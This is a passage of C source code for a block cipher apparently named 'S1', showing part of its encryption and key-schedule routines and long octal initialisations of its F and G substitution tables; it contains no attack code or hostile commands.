				 ^ block[(r+1) % 8]) << 4);
	}
	i=0;
	while (i<8) {
		block[i] = block[i] ^ clear_family[i];
		i=i+1;
	}
	return 0;
}


#ifdef KEYGEN_CHIP
/* WARNING: this feature is not implemented on all chip sets */
int S1_create_key(u_char *key_value, u_char *key_vector)
{
	if (initialized == 0)
		return 1;
	memcpy(key_vector,key_value,10);
	key_vector[10] = 0;
	key_vector[11] = 0;
	S1_encrypt_block(INTEGRITY,key_vector+4);
	S1_encrypt_block(INTEGRITY,key_vector);
	return 0;
}
#else
int S1_create_key(u_char *key_value, u_char *key_vector)
{
	return 7;
}
#endif


/* SUPPORT FUNCTIONS */


static void
rotatekey(int key_register, u_char *key_value)
{
	int i, j;
	int jshift[6] = {5, 8, 3, 1, 4, 0};

	key_register = key_register % KEY_REGISTERS;
	i=0;
	while (i<32) {
		j=0;
		while (j<6) {
			fullkey[key_register][i][j] =
			    f(0,(key_value[(i*6+j+jshift[j]) % 10]))
			  ^ f(1,(key_value[(i*6+j+jshift[(j+1)%6]) % 10]))
			  ^ (f(2,(key_value[(i*6+j+jshift[(j+2)%6]) % 10]))<<4)
			  ^ (f(3,(key_value[(i*6+j+jshift[(j+3)%6]) % 10]))<<4);
			j=j+1;
		}
		i=i+1;
	}
}

static void f_initialize() {
	/* NON-LINEAR (F0, F1, F2, F3) */
	F[0][0] = 07;
	F[0][1] = 02;
	F[0][2] = 011;
	F[0][3] = 014;
	F[0][4] = 010;
	F[0][5] = 016;
	F[0][6] = 01;
	F[0][7] = 06;
	F[0][8] = 015;
	F[0][9] = 02;
	F[0][10] = 00;
	F[0][11] = 04;
	F[0][12] = 017;
	F[0][13] = 07;
	F[0][14] = 03;
	F[0][15] = 017;
	F[0][16] = 010;
	F[0][17] = 017;
	F[0][18] = 012;
	F[0][19] = 05;
	F[0][20] = 013;
	F[0][21] = 00;
	F[0][22] = 017;
	F[0][23] = 02;
	F[0][24] = 05;
	F[0][25] = 015;
	F[0][26] = 017;
	F[0][27] = 017;
	F[0][28] = 011;
	F[0][29] = 011;
	F[0][30] = 06;
	F[0][31] = 014;
	F[0][32] = 07;
	F[0][33] = 017;
	F[0][34] = 012;
	F[0][35] = 016;
	F[0][36] = 012;
	F[0][37] = 06;
	F[0][38] = 04;
	F[0][39] = 04;
	F[0][40] = 014;
	F[0][41] = 04;
	F[0][42] = 017;
	F[0][43] = 013;
	F[0][44] = 03;
	F[0][45] = 014;
	F[0][46] = 014;
	F[0][47] = 06;
	F[0][48] = 06;
	F[0][49] = 00;
	F[0][50] = 02;
	F[0][51] = 010;
	F[0][52] = 012;
	F[0][53] = 012;
	F[0][54] = 03;
	F[0][55] = 015;
	F[0][56] = 013;
	F[0][57] = 014;
	F[0][58] = 017;
	F[0][59] = 05;
	F[0][60] = 05;
	F[0][61] = 00;
	F[0][62] = 07;
	F[0][63] = 014;
	F[0][64] = 016;
	F[0][65] = 011;
	F[0][66] = 03;
	F[0][67] = 011;
	F[0][68] = 010;
	F[0][69] = 014;
	F[0][70] = 012;
	F[0][71] = 014;
	F[0][72] = 017;
	F[0][73] = 05;
	F[0][74] = 07;
	F[0][75] = 05;
	F[0][76] = 07;
	F[0][77] = 016;
	F[0][78] = 03;
	F[0][79] = 02;
	F[0][80] = 011;
	F[0][81] = 014;
	F[0][82] = 04;
	F[0][83] = 00;
	F[0][84] = 010;
	F[0][85] = 016;
	F[0][86] = 02;
	F[0][87] = 03;
	F[0][88] = 02;
	F[0][89] = 016;
	F[0][90] = 013;
	F[0][91] = 04;
	F[0][92] = 010;
	F[0][93] = 01;
	F[0][94] = 06;
	F[0][95] = 013;
	F[0][96] = 016;
	F[0][97] = 010;
	F[0][98] = 017;
	F[0][99] = 014;
	F[0][100] = 00;
	F[0][101] = 02;
	F[0][102] = 00;
	F[0][103] = 01;
	F[0][104] = 01;
	F[0][105] = 013;
	F[0][106] = 016;
	F[0][107] = 00;
	F[0][108] = 02;
	F[0][109] = 013;
	F[0][110] = 017;
	F[0][111] = 013;
	F[0][112] = 016;
	F[0][113] = 016;
	F[0][114] = 02;
	F[0][115] = 05;
	F[0][116] = 02;
	F[0][117] = 00;
	F[0][118] = 016;
	F[0][119] = 01;
	F[0][120] = 010;
	F[0][121] = 013;
	F[0][122] = 011;
	F[0][123] = 06;
	F[0][124] = 01;
	F[0][125] = 05;
	F[0][126] = 07;
	F[0][127] = 07;
	F[0][128] = 016;
	F[0][129] = 014;
	F[0][130] = 012;
	F[0][131] = 011;
	F[0][132] = 011;
	F[0][133] = 016;
	F[0][134] = 07;
	F[0][135] = 014;
	F[0][136] = 011;
	F[0][137] = 015;
	F[0][138] = 012;
	F[0][139] = 00;
	F[0][140] = 010;
	F[0][141] = 00;
	F[0][142] = 07;
	F[0][143] = 012;
	F[0][144] = 015;
	F[0][145] = 013;
	F[0][146] = 00;
	F[0][147] = 012;
	F[0][148] = 04;
	F[0][149] = 017;
	F[0][150] = 05;
	F[0][151] = 00;
	F[0][152] = 015;
	F[0][153] = 02;
	F[0][154] = 016;
	F[0][155] = 03;
	F[0][156] = 03;
	F[0][157] = 013;
	F[0][158] = 06;
	F[0][159] = 011;
	F[0][160] = 014;
	F[0][161] = 03;
	F[0][162] = 017;
	F[0][163] = 014;
	F[0][164] = 00;
	F[0][165] = 013;
	F[0][166] = 06;
	F[0][167] = 017;
	F[0][168] = 010;
	F[0][169] = 015;
	F[0][170] = 01;
	F[0][171] = 012;
	F[0][172] = 05;
	F[0][173] = 010;
	F[0][174] = 06;
	F[0][175] = 07;
	F[0][176] = 06;
	F[0][177] = 03;
	F[0][178] = 017;
	F[0][179] = 06;
	F[0][180] = 015;
	F[0][181] = 015;
	F[0][182] = 01;
	F[0][183] = 013;
	F[0][184] = 04;
	F[0][185] = 012;
	F[0][186] = 03;
	F[0][187] = 00;
	F[0][188] = 06;
	F[0][189] = 011;
	F[0][190] = 011;
	F[0][191] = 015;
	F[0][192] = 012;
	F[0][193] = 017;
	F[0][194] = 016;
	F[0][195] = 01;
	F[0][196] = 015;
	F[0][197] = 016;
	F[0][198] = 017;
	F[0][199] = 04;
	F[0][200] = 015;
	F[0][201] = 06;
	F[0][202] = 07;
	F[0][203] = 04;
	F[0][204] = 00;
	F[0][205] = 017;
	F[0][206] = 016;
	F[0][207] = 017;
	F[0][208] = 010;
	F[0][209] = 02;
	F[0][210] = 04;
	F[0][211] = 012;
	F[0][212] = 01;
	F[0][213] = 02;
	F[0][214] = 011;
	F[0][215] = 07;
	F[0][216] = 010;
	F[0][217] = 010;
	F[0][218] = 02;
	F[0][219] = 02;
	F[0][220] = 07;
	F[0][221] = 010;
	F[0][222] = 010;
	F[0][223] = 013;
	F[0][224] = 03;
	F[0][225] = 016;
	F[0][226] = 017;
	F[0][227] = 011;
	F[0][228] = 06;
	F[0][229] = 011;
	F[0][230] = 00;
	F[0][231] = 017;
	F[0][232] = 014;
	F[0][233] = 06;
	F[0][234] = 04;
	F[0][235] = 02;
	F[0][236] = 03;
	F[0][237] = 00;
	F[0][238] = 011;
	F[0][239] = 013;
	F[0][240] = 014;
	F[0][241] = 05;
	F[0][242] = 03;
	F[0][243] = 016;
	F[0][244] = 013;
	F[0][245] = 017;
	F[0][246] = 04;
	F[0][247] = 05;
	F[0][248] = 017;
	F[0][249] = 011;
	F[0][250] = 03;
	F[0][251] = 06;
	F[0][252] = 010;
	F[0][253] = 013;
	F[0][254] = 014;
	F[0][255] = 06;
	F[1][0] = 017;
	F[1][1] = 06;
	F[1][2] = 016;
	F[1][3] = 015;
	F[1][4] = 012;
	F[1][5] = 07;
	F[1][6] = 07;
	F[1][7] = 03;
	F[1][8] = 03;
	F[1][9] = 01;
	F[1][10] = 017;
	F[1][11] = 00;
	F[1][12] = 013;
	F[1][13] = 07;
	F[1][14] = 02;
	F[1][15] = 010;
	F[1][16] = 01;
	F[1][17] = 014;
	F[1][18] = 012;
	F[1][19] = 01;
	F[1][20] = 07;
	F[1][21] = 03;
	F[1][22] = 01;
	F[1][23] = 016;
	F[1][24] = 014;
	F[1][25] = 011;
	F[1][26] = 00;
	F[1][27] = 01;
	F[1][28] = 06;
	F[1][29] = 02;
	F[1][30] = 011;
	F[1][31] = 013;
	F[1][32] = 014;
	F[1][33] = 011;
	F[1][34] = 07;
	F[1][35] = 012;
	F[1][36] = 03;
	F[1][37] = 03;
	F[1][38] = 010;
	F[1][39] = 00;
	F[1][40] = 00;
	F[1][41] = 012;
	F[1][42] = 04;
	F[1][43] = 00;
	F[1][44] = 02;
	F[1][45] = 017;
	F[1][46] = 015;
	F[1][47] = 013;
	F[1][48] = 02;
	F[1][49] = 017;
	F[1][50] = 05;
	F[1][51] = 04;
	F[1][52] = 03;
	F[1][53] = 013;
	F[1][54] = 017;
	F[1][55] = 03;
	F[1][56] = 011;
	F[1][57] = 012;
	F[1][58] = 01;
	F[1][59] = 011;
	F[1][60] = 07;
	F[1][61] = 011;
	F[1][62] = 011;
	F[1][63] = 010;
	F[1][64] = 01;
	F[1][65] = 05;
	F[1][66] = 02;
	F[1][67] = 03;
	F[1][68] = 010;
	F[1][69] = 017;
	F[1][70] = 07;
	F[1][71] = 012;
	F[1][72] = 015;
	F[1][73] = 011;
	F[1][74] = 010;
	F[1][75] = 017;
	F[1][76] = 03;
	F[1][77] = 016;
	F[1][78] = 03;
	F[1][79] = 015;
	F[1][80] = 011;
	F[1][81] = 013;
	F[1][82] = 05;
	F[1][83] = 07;
	F[1][84] = 017;
	F[1][85] = 012;
	F[1][86] = 012;
	F[1][87] = 07;
	F[1][88] = 017;
	F[1][89] = 05;
	F[1][90] = 07;
	F[1][91] = 00;
	F[1][92] = 04;
	F[1][93] = 04;
	F[1][94] = 04;
	F[1][95] = 06;
	F[1][96] = 011;
	F[1][97] = 04;
	F[1][98] = 07;
	F[1][99] = 010;
	F[1][100] = 010;
	F[1][101] = 015;
	F[1][102] = 017;
	F[1][103] = 00;
	F[1][104] = 012;
	F[1][105] = 02;
	F[1][106] = 01;
	F[1][107] = 016;
	F[1][108] = 00;
	F[1][109] = 05;
	F[1][110] = 03;
	F[1][111] = 011;
	F[1][112] = 05;
	F[1][113] = 014;
	F[1][114] = 011;
	F[1][115] = 00;
	F[1][116] = 011;
	F[1][117] = 00;
	F[1][118] = 013;
	F[1][119] = 010;
	F[1][120] = 016;
	F[1][121] = 014;
	F[1][122] = 04;
	F[1][123] = 03;
	F[1][124] = 015;
	F[1][125] = 016;
	F[1][126] = 02;
	F[1][127] = 03;
	F[1][128] = 012;
	F[1][129] = 06;
	F[1][130] = 017;
	F[1][131] = 00;
	F[1][132] = 011;
	F[1][133] = 011;
	F[1][134] = 02;
	F[1][135] = 017;
	F[1][136] = 013;
	F[1][137] = 04;
	F[1][138] = 07;
	F[1][139] = 02;
	F[1][140] = 02;
	F[1][141] = 014;
	F[1][142] = 04;
	F[1][143] = 07;
	F[1][144] = 014;
	F[1][145] = 01;
	F[1][146] = 00;
	F[1][147] = 03;
	F[1][148] = 01;
	F[1][149] = 010;
	F[1][150] = 01;
	F[1][151] = 07;
	F[1][152] = 012;
	F[1][153] = 00;
	F[1][154] = 015;
	F[1][155] = 04;
	F[1][156] = 00;
	F[1][157] = 017;
	F[1][158] = 04;
	F[1][159] = 00;
	F[1][160] = 017;
	F[1][161] = 014;
	F[1][162] = 04;
	F[1][163] = 07;
	F[1][164] = 013;
	F[1][165] = 011;
	F[1][166] = 012;
	F[1][167] = 017;
	F[1][168] = 017;
	F[1][169] = 03;
	F[1][170] = 07;
	F[1][171] = 00;
	F[1][172] = 04;
	F[1][173] = 07;
	F[1][174] = 07;
	F[1][175] = 03;
	F[1][176] = 05;
	F[1][177] = 06;
	F[1][178] = 017;
	F[1][179] = 03;
	F[1][180] = 017;
	F[1][181] = 02;
	F[1][182] = 04;
	F[1][183] = 017;
	F[1][184] = 00;
	F[1][185] = 014;
	F[1][186] = 017;
	F[1][187] = 04;
	F[1][188] = 05;
	F[1][189] = 016;
	F[1][190] = 015;
	F[1][191] = 04;
	F[1][192] = 012;
	F[1][193] = 013;
	F[1][194] = 00;
	F[1][195] = 04;
	F[1][196] = 017;
	F[1][197] = 07;
	F[1][198] = 013;
	F[1][199] = 04;
	F[1][200] = 010;
	F[1][201] = 05;
	F[1][202] = 07;
	F[1][203] = 04;
	F[1][204] = 013;
	F[1][205] = 05;
	F[1][206] = 016;
	F[1][207] = 010;
	F[1][208] = 015;
	F[1][209] = 00;
	F[1][210] = 04;
	F[1][211] = 04;
	F[1][212] = 017;
	F[1][213] = 010;
	F[1][214] = 05;
	F[1][215] = 015;
	F[1][216] = 011;
	F[1][217] = 01;
	F[1][218] = 012;
	F[1][219] = 013;
	F[1][220] = 015;
	F[1][221] = 03;
	F[1][222] = 010;
	F[1][223] = 05;
	F[1][224] = 07;
	F[1][225] = 06;
	F[1][226] = 00;
	F[1][227] = 02;
	F[1][228] = 011;
	F[1][229] = 06;
	F[1][230] = 00;
	F[1][231] = 017;
	F[1][232] = 01;
	F[1][233] = 010;
	F[1][234] = 03;
	F[1][235] = 06;
	F[1][236] = 05;
	F[1][237] = 010;
	F[1][238] = 010;
	F[1][239] = 012;
	F[1][240] = 014;
	F[1][241] = 02;
	F[1][242] = 02;
	F[1][243] = 02;
	F[1][244] = 010;
	F[1][245] = 04;
	F[1][246] = 013;
	F[1][247] = 07;
	F[1][248] = 016;
	F[1][249] = 015;
	F[1][250] = 05;
	F[1][251] = 017;
	F[1][252] = 05;
	F[1][253] = 03;
	F[1][254] = 010;
	F[1][255] = 010;
	F[2][0] = 013;
	F[2][1] = 011;
	F[2][2] = 017;
	F[2][3] = 07;
	F[2][4] = 01;
	F[2][5] = 012;
	F[2][6] = 00;
	F[2][7] = 011;
	F[2][8] = 06;
	F[2][9] = 010;
	F[2][10] = 012;
	F[2][11] = 014;
	F[2][12] = 00;
	F[2][13] = 012;
	F[2][14] = 01;
	F[2][15] = 012;
	F[2][16] = 011;
	F[2][17] = 014;
	F[2][18] = 05;
	F[2][19] = 05;
	F[2][20] = 07;
	F[2][21] = 04;
	F[2][22] = 013;
	F[2][23] = 015;
	F[2][24] = 04;
	F[2][25] = 00;
	F[2][26] = 01;
	F[2][27] = 010;
	F[2][28] = 017;
	F[2][29] = 02;
	F[2][30] = 015;
	F[2][31] = 012;
	F[2][32] = 06;
	F[2][33] = 00;
	F[2][34] = 07;
	F[2][35] = 017;
	F[2][36] = 014;
	F[2][37] = 013;
	F[2][38] = 011;
	F[2][39] = 03;
	F[2][40] = 07;
	F[2][41] = 013;
	F[2][42] = 06;
	F[2][43] = 05;
	F[2][44] = 011;
	F[2][45] = 010;
	F[2][46] = 00;
	F[2][47] = 02;
	F[2][48] = 07;
	F[2][49] = 011;
	F[2][50] = 016;
	F[2][51] = 01;
	F[2][52] = 012;
	F[2][53] = 014;
	F[2][54] = 012;
	F[2][55] = 06;
	F[2][56] = 011;
	F[2][57] = 016;
	F[2][58] = 015;
	F[2][59] = 06;
	F[2][60] = 07;
	F[2][61] = 05;
	F[2][62] = 014;
	F[2][63] = 07;
	F[2][64] = 01;
	F[2][65] = 06;
	F[2][66] = 012;
	F[2][67] = 06;
	F[2][68] = 05;
	F[2][69] = 04;
	F[2][70] = 03;
	F[2][71] = 011;
	F[2][72] = 04;
	F[2][73] = 014;
	F[2][74] = 013;
	F[2][75] = 00;
	F[2][76] = 010;
	F[2][77] = 016;
	F[2][78] = 03;
	F[2][79] = 06;
	F[2][80] = 00;
	F[2][81] = 017;
	F[2][82] = 02;
	F[2][83] = 010;
	F[2][84] = 010;
	F[2][85] = 012;
	F[2][86] = 012;
	F[2][87] = 017;
	F[2][88] = 07;
	F[2][89] = 03;
	F[2][90] = 012;
	F[2][91] = 012;
	F[2][92] = 013;
	F[2][93] = 014;
	F[2][94] = 013;
	F[2][95] = 03;
	F[2][96] = 011;
	F[2][97] = 012;
	F[2][98] = 06;
	F[2][99] = 02;
	F[2][100] = 02;
	F[2][101] = 02;
	F[2][102] = 011;
	F[2][103] = 04;
	F[2][104] = 06;
	F[2][105] = 010;
	F[2][106] = 05;
	F[2][107] = 01;
	F[2][108] = 016;
	F[2][109] = 07;
	F[2][110] = 017;
	F[2][111] = 00;
	F[2][112] = 013;
	F[2][113] = 012;
	F[2][114] = 016;
	F[2][115] = 07;
	F[2][116] = 016;
	F[2][117] = 01;
	F[2][118] = 04;
	F[2][119] = 015;
	F[2][120] = 07;
	F[2][121] = 014;
	F[2][122] = 00;
	F[2][123] = 04;
	F[2][124] = 06;
	F[2][125] = 016;
	F[2][126] = 011;
	F[2][127] = 014;
	F[2][128] = 06;
	F[2][129] = 011;
	F[2][130] = 012;
	F[2][131] = 02;
	F[2][132] = 012;
	F[2][133] = 016;
	F[2][134] = 013;
	F[2][135] = 00;
	F[2][136] = 00;
	F[2][137] = 03;
	F[2][138] = 03;
	F[2][139] = 015;
	F[2][140] = 07;
	F[2][141] = 012;
	F[2][142] = 00;
	F[2][143] = 012;
	F[2][144] = 017;
	F[2][145] = 011;
	F[2][146] = 05;
	F[2][147] = 05;
	F[2][148] = 010;
	F[2][149] = 04;
	F[2][150] = 04;
	F[2][151] = 05;
	F[2][152] = 014;
	F[2][153] = 012;
	F[2][154] = 011;
	F[2][155] = 015;
	F[2][156] = 015;
	F[2][157] = 013;
	F[2][158] = 017;
	F[2][159] = 014;
	F[2][160] = 011;
	F[2][161] = 07;
	F[2][162] = 013;
	F[2][163] = 01;
	F[2][164] = 00;
	F[2][165] = 015;
	F[2][166] = 011;
	F[2][167] = 05;
	F[2][168] = 015;
	F[2][169] = 016;
	F[2][170] = 012;
	F[2][171] = 017;
	F[2][172] = 01;
	F[2][173] = 015;
	F[2][174] = 07;
	F[2][175] = 012;
	F[2][176] = 010;
	F[2][177] = 017;
	F[2][178] = 07;
	F[2][179] = 04;
	F[2][180] = 011;
	F[2][181] = 013;
	F[2][182] = 01;
	F[2][183] = 010;
	F[2][184] = 06;
	F[2][185] = 03;
	F[2][186] = 010;
	F[2][187] = 02;
	F[2][188] = 05;
	F[2][189] = 010;
	F[2][190] = 011;
	F[2][191] = 02;
	F[2][192] = 04;
	F[2][193] = 017;
	F[2][194] = 012;
	F[2][195] = 06;
	F[2][196] = 05;
	F[2][197] = 05;
	F[2][198] = 015;
	F[2][199] = 012;
	F[2][200] = 00;
	F[2][201] = 03;
	F[2][202] = 04;
	F[2][203] = 015;
	F[2][204] = 016;
	F[2][205] = 015;
	F[2][206] = 015;
	F[2][207] = 011;
	F[2][208] = 03;
	F[2][209] = 05;
	F[2][210] = 013;
	F[2][211] = 016;
	F[2][212] = 02;
	F[2][213] = 017;
	F[2][214] = 013;
	F[2][215] = 00;
	F[2][216] = 03;
	F[2][217] = 012;
	F[2][218] = 02;
	F[2][219] = 07;
	F[2][220] = 03;
	F[2][221] = 010;
	F[2][222] = 011;
	F[2][223] = 01;
	F[2][224] = 06;
	F[2][225] = 02;
	F[2][226] = 014;
	F[2][227] = 01;
	F[2][228] = 012;
	F[2][229] = 010;
	F[2][230] = 02;
	F[2][231] = 012;
	F[2][232] = 013;
	F[2][233] = 017;
	F[2][234] = 013;
	F[2][235] = 014;
	F[2][236] = 05;
	F[2][237] = 02;
	F[2][238] = 02;
	F[2][239] = 013;
	F[2][240] = 011;
	F[2][241] = 013;
	F[2][242] = 02;
	F[2][243] = 05;
	F[2][244] = 014;
	F[2][245] = 017;
	F[2][246] = 06;
	F[2][247] = 015;
	F[2][248] = 01;
	F[2][249] = 011;
	F[2][250] = 012;
	F[2][251] = 00;
	F[2][252] = 013;
	F[2][253] = 05;
	F[2][254] = 03;
	F[2][255] = 015;
	F[3][0] = 013;
	F[3][1] = 07;
	F[3][2] = 04;
	F[3][3] = 01;
	F[3][4] = 03;
	F[3][5] = 017;
	F[3][6] = 07;
	F[3][7] = 05;
	F[3][8] = 014;
	F[3][9] = 02;
	F[3][10] = 05;
	F[3][11] = 016;
	F[3][12] = 013;
	F[3][13] = 04;
	F[3][14] = 013;
	F[3][15] = 01;
	F[3][16] = 015;
	F[3][17] = 015;
	F[3][18] = 014;
	F[3][19] = 015;
	F[3][20] = 01;
	F[3][21] = 010;
	F[3][22] = 04;
	F[3][23] = 02;
	F[3][24] = 07;
	F[3][25] = 015;
	F[3][26] = 016;
	F[3][27] = 016;
	F[3][28] = 01;
	F[3][29] = 03;
	F[3][30] = 011;
	F[3][31] = 011;
	F[3][32] = 010;
	F[3][33] = 017;
	F[3][34] = 06;
	F[3][35] = 04;
	F[3][36] = 013;
	F[3][37] = 010;
	F[3][38] = 014;
	F[3][39] = 013;
	F[3][40] = 03;
	F[3][41] = 010;
	F[3][42] = 015;
	F[3][43] = 07;
	F[3][44] = 07;
	F[3][45] = 00;
	F[3][46] = 05;
	F[3][47] = 01;
	F[3][48] = 03;
	F[3][49] = 013;
	F[3][50] = 015;
	F[3][51] = 04;
	F[3][52] = 017;
	F[3][53] = 015;
	F[3][54] = 03;
	F[3][55] = 017;
	F[3][56] = 013;
	F[3][57] = 03;
	F[3][58] = 013;
	F[3][59] = 011;
	F[3][60] = 00;
	F[3][61] = 010;
	F[3][62] = 01;
	F[3][63] = 07;
	F[3][64] = 03;
	F[3][65] = 04;
	F[3][66] = 04;
	F[3][67] = 03;
	F[3][68] = 03;
	F[3][69] = 010;
	F[3][70] = 016;
	F[3][71] = 00;
	F[3][72] = 01;
	F[3][73] = 011;
	F[3][74] = 015;
	F[3][75] = 02;
	F[3][76] = 013;
	F[3][77] = 03;
	F[3][78] = 07;
	F[3][79] = 010;
	F[3][80] = 010;
	F[3][81] = 07;
	F[3][82] = 014;
	F[3][83] = 015;
	F[3][84] = 013;
	F[3][85] = 05;
	F[3][86] = 00;
	F[3][87] = 012;
	F[3][88] = 012;
	F[3][89] = 016;
	F[3][90] = 07;
	F[3][91] = 02;
	F[3][92] = 017;
	F[3][93] = 06;
	F[3][94] = 017;
	F[3][95] = 015;
	F[3][96] = 013;
	F[3][97] = 02;
	F[3][98] = 03;
	F[3][99] = 013;
	F[3][100] = 01;
	F[3][101] = 02;
	F[3][102] = 017;
	F[3][103] = 06;
	F[3][104] = 04;
	F[3][105] = 07;
	F[3][106] = 04;
	F[3][107] = 017;
	F[3][108] = 03;
	F[3][109] = 03;
	F[3][110] = 02;
	F[3][111] = 00;
	F[3][112] = 05;
	F[3][113] = 01;
	F[3][114] = 00;
	F[3][115] = 016;
	F[3][116] = 014;
	F[3][117] = 05;
	F[3][118] = 02;
	F[3][119] = 04;
	F[3][120] = 07;
	F[3][121] = 014;
	F[3][122] = 07;
	F[3][123] = 012;
	F[3][124] = 05;
	F[3][125] = 017;
	F[3][126] = 011;
	F[3][127] = 01;
	F[3][128] = 06;
	F[3][129] = 00;
	F[3][130] = 015;
	F[3][131] = 014;
	F[3][132] = 017;
	F[3][133] = 01;
	F[3][134] = 00;
	F[3][135] = 04;
	F[3][136] = 00;
	F[3][137] = 00;
	F[3][138] = 011;
	F[3][139] = 04;
	F[3][140] = 013;
	F[3][141] = 012;
	F[3][142] = 03;
	F[3][143] = 015;
	F[3][144] = 01;
	F[3][145] = 05;
	F[3][146] = 04;
	F[3][147] = 02;
	F[3][148] = 011;
	F[3][149] = 07;
	F[3][150] = 00;
	F[3][151] = 011;
	F[3][152] = 015;
	F[3][153] = 011;
	F[3][154] = 00;
	F[3][155] = 05;
	F[3][156] = 07;
	F[3][157] = 016;
	F[3][158] = 017;
	F[3][159] = 02;
	F[3][160] = 05;
	F[3][161] = 013;
	F[3][162] = 06;
	F[3][163] = 04;
	F[3][164] = 06;
	F[3][165] = 01;
	F[3][166] = 013;
	F[3][167] = 04;
	F[3][168] = 06;
	F[3][169] = 015;
	F[3][170] = 010;
	F[3][171] = 012;
	F[3][172] = 03;
	F[3][173] = 010;
	F[3][174] = 017;
	F[3][175] = 013;
	F[3][176] = 011;
	F[3][177] = 010;
	F[3][178] = 07;
	F[3][179] = 00;
	F[3][180] = 014;
	F[3][181] = 03;
	F[3][182] = 05;
	F[3][183] = 00;
	F[3][184] = 013;
	F[3][185] = 016;
	F[3][186] = 013;
	F[3][187] = 014;
	F[3][188] = 01;
	F[3][189] = 02;
	F[3][190] = 016;
	F[3][191] = 06;
	F[3][192] = 012;
	F[3][193] = 016;
	F[3][194] = 014;
	F[3][195] = 03;
	F[3][196] = 04;
	F[3][197] = 06;
	F[3][198] = 00;
	F[3][199] = 017;
	F[3][200] = 00;
	F[3][201] = 014;
	F[3][202] = 05;
	F[3][203] = 016;
	F[3][204] = 01;
	F[3][205] = 01;
	F[3][206] = 04;
	F[3][207] = 03;
	F[3][208] = 01;
	F[3][209] = 010;
	F[3][210] = 00;
	F[3][211] = 013;
	F[3][212] = 010;
	F[3][213] = 03;
	F[3][214] = 015;
	F[3][215] = 03;
	F[3][216] = 07;
	F[3][217] = 017;
	F[3][218] = 014;
	F[3][219] = 012;
	F[3][220] = 06;
	F[3][221] = 01;
	F[3][222] = 01;
	F[3][223] = 03;
	F[3][224] = 00;
	F[3][225] = 06;
	F[3][226] = 012;
	F[3][227] = 05;
	F[3][228] = 05;
	F[3][229] = 06;
	F[3][230] = 07;
	F[3][231] = 010;
	F[3][232] = 017;
	F[3][233] = 016;
	F[3][234] = 01;
	F[3][235] = 05;
	F[3][236] = 00;
	F[3][237] = 016;
	F[3][238] = 00;
	F[3][239] = 00;
	F[3][240] = 014;
	F[3][241] = 017;
	F[3][242] = 010;
	F[3][243] = 00;
	F[3][244] = 06;
	F[3][245] = 012;
	F[3][246] = 011;
	F[3][247] = 016;
	F[3][248] = 017;
	F[3][249] = 017;
	F[3][250] = 03;
	F[3][251] = 03;
	F[3][252] = 014;
	F[3][253] = 00;
	F[3][254] = 015;
	F[3][255] = 017;
	/* PSEUDO-LINEAR (G0, G1) */
	G[0][0] = 00;
	G[0][1] = 00;
	G[0][2] = 01;
	G[0][3] = 01;
	G[0][4] = 00;
	G[0][5] = 01;
	G[0][6] = 01;
	G[0][7] = 00;
	G[0][8] = 00;
	G[0][9] = 01;
	G[0][10] = 00;
	G[0][11] = 00;
	G[0][12] = 01;
	G[0][13] = 01;
	G[0][14] = 00;
	G[0][15] = 01;
	G[0][16] = 01;
	G[0][17] = 00;
	G[0][18] = 00;
	G[0][19] = 01;
	G[0][20] = 00;
	G[0][21] = 00;
	G[0][22] = 01;
	G[0][23] = 01;
	G[0][24] = 00;
	G[0][25] = 01;
	G[0][26] = 01;
	G[0][27] = 00;
	G[0][28] = 00;
	G[0][29] = 01;
	G[0][30] = 00;
	G[0][31] = 00;
	G[0][32] = 01;
	G[0][33] = 01;
	G[0][34] = 00;
	G[0][35] = 01;
	G[0][36] = 01;
	G[0][37] = 00;
	G[0][38] = 00;
	G[0][39] = 01;
	G[0][40] = 00;
	G[0][41] = 00;
	G[0][42] = 01;
	G[0][43] = 01;
	G[0][44] = 00;
	G[0][45] = 01;
	G[0][46] = 01;
	G[0][47] = 00;
	G[0][48] = 00;
	G[0][49] = 01;
	G[0][50] = 00;
	G[0][51] = 00;
	G[0][52] = 01;
	G[0][53] = 01;
	G[0][54] = 00;
	G[0][55] = 01;
	G[0][56] = 01;
	G[0][57] = 00;
	G[0][58] = 00;
	G[0][59] = 01;
	G[0][60] = 00;
	G[0][61] = 00;
	G[0][62] = 01;
	G[0][63] = 01;
	G[0][64] = 00;
	G[0][65] = 01;
	G[0][66] = 01;
	G[0][67] = 00;
	G[0][68] = 00;
	G[0][69] = 01;
	G[0][70] = 00;
	G[0][71] = 00;
	G[0][72] = 01;
	G[0][73] = 01;
	G[0][74] = 00;
	G[0][75] = 01;
	G[0][76] = 01;
	G[0][77] = 00;
	G[0][78] = 00;
	G[0][79] = 01;
	G[0][80] = 00;
	G[0][81] = 00;
	G[0][82] = 01;
	G[0][83] = 01;
	G[0][84] = 00;
	G[0][85] = 01;
	G[0][86] = 01;
	G[0][87] = 00;
	G[0][88] = 00;
	G[0][89] = 01;
	G[0][90] = 00;
	G[0][91] = 00;
	G[0][92] = 01;
	G[0][93] = 01;
	G[0][94] = 00;
	G[0][95] = 01;
	G[0][96] = 01;
	G[0][97] = 00;
	G[0][98] = 00;
	G[0][99] = 01;
	G[0][100] = 00;
	G[0][101] = 00;
	G[0][102] = 01;
	G[0][103] = 01;
	G[0][104] = 00;
	G[0][105] = 01;
	G[0][106] = 01;
	G[0][107] = 00;
	G[0][108] = 00;
	G[0][109] = 01;
	G[0][110] = 00;
	G[0][111] = 00;
	G[0][112] = 01;
	G[0][113] = 01;
	G[0][114] = 00;
	G[0][115] = 01;
	G[0][116] = 01;
	G[0][117] = 00;
	G[0][118] = 00;
	G[0][119] = 01;
	G[0][120] = 00;
	G[0][121] = 00;
	G[0][122] = 01;
	G[0][123] = 01;
	G[0][124] = 00;
	G[0][125] = 01;
	G[0][126] = 01;
	G[0][127] = 00;
	G[0][128] = 00;
	G[0][129] = 01;
	G[0][130] = 00;
	G[0][131] = 00;
	G[0][132] = 01;
	G[0][133] = 01;
	G[0][134] = 00;
	G[0][135] = 01;
	G[0][136] = 01;
	G[0][137] = 00;
	G[0][138] = 00;
	G[0][139] = 01;
	G[0][140] = 00;
	G[0][141] = 00;
	G[0][142] = 01;
	G[0][143] = 01;
	G[0][144] = 00;
	G[0][145] = 01;
	G[0][146] = 01;
	G[0][147] = 00;
	G[0][148] = 00;
	G[0][149] = 01;
	G[0][150] = 00;
	G[0][151] = 00;
	G[0][152] = 01;
	G[0][153] = 01;
	G[0][154] = 00;
	G[0][155] = 01;
	G[0][156] = 01;
	G[0][157] = 00;
	G[0][158] = 00;
	G[0][159] = 01;
	G[0][160] = 00;
	G[0][161] = 00;
	G[0][162] = 01;
	G[0][163] = 01;
	G[0][164] = 00;
	G[0][165] = 01;
	G[0][166] = 01;
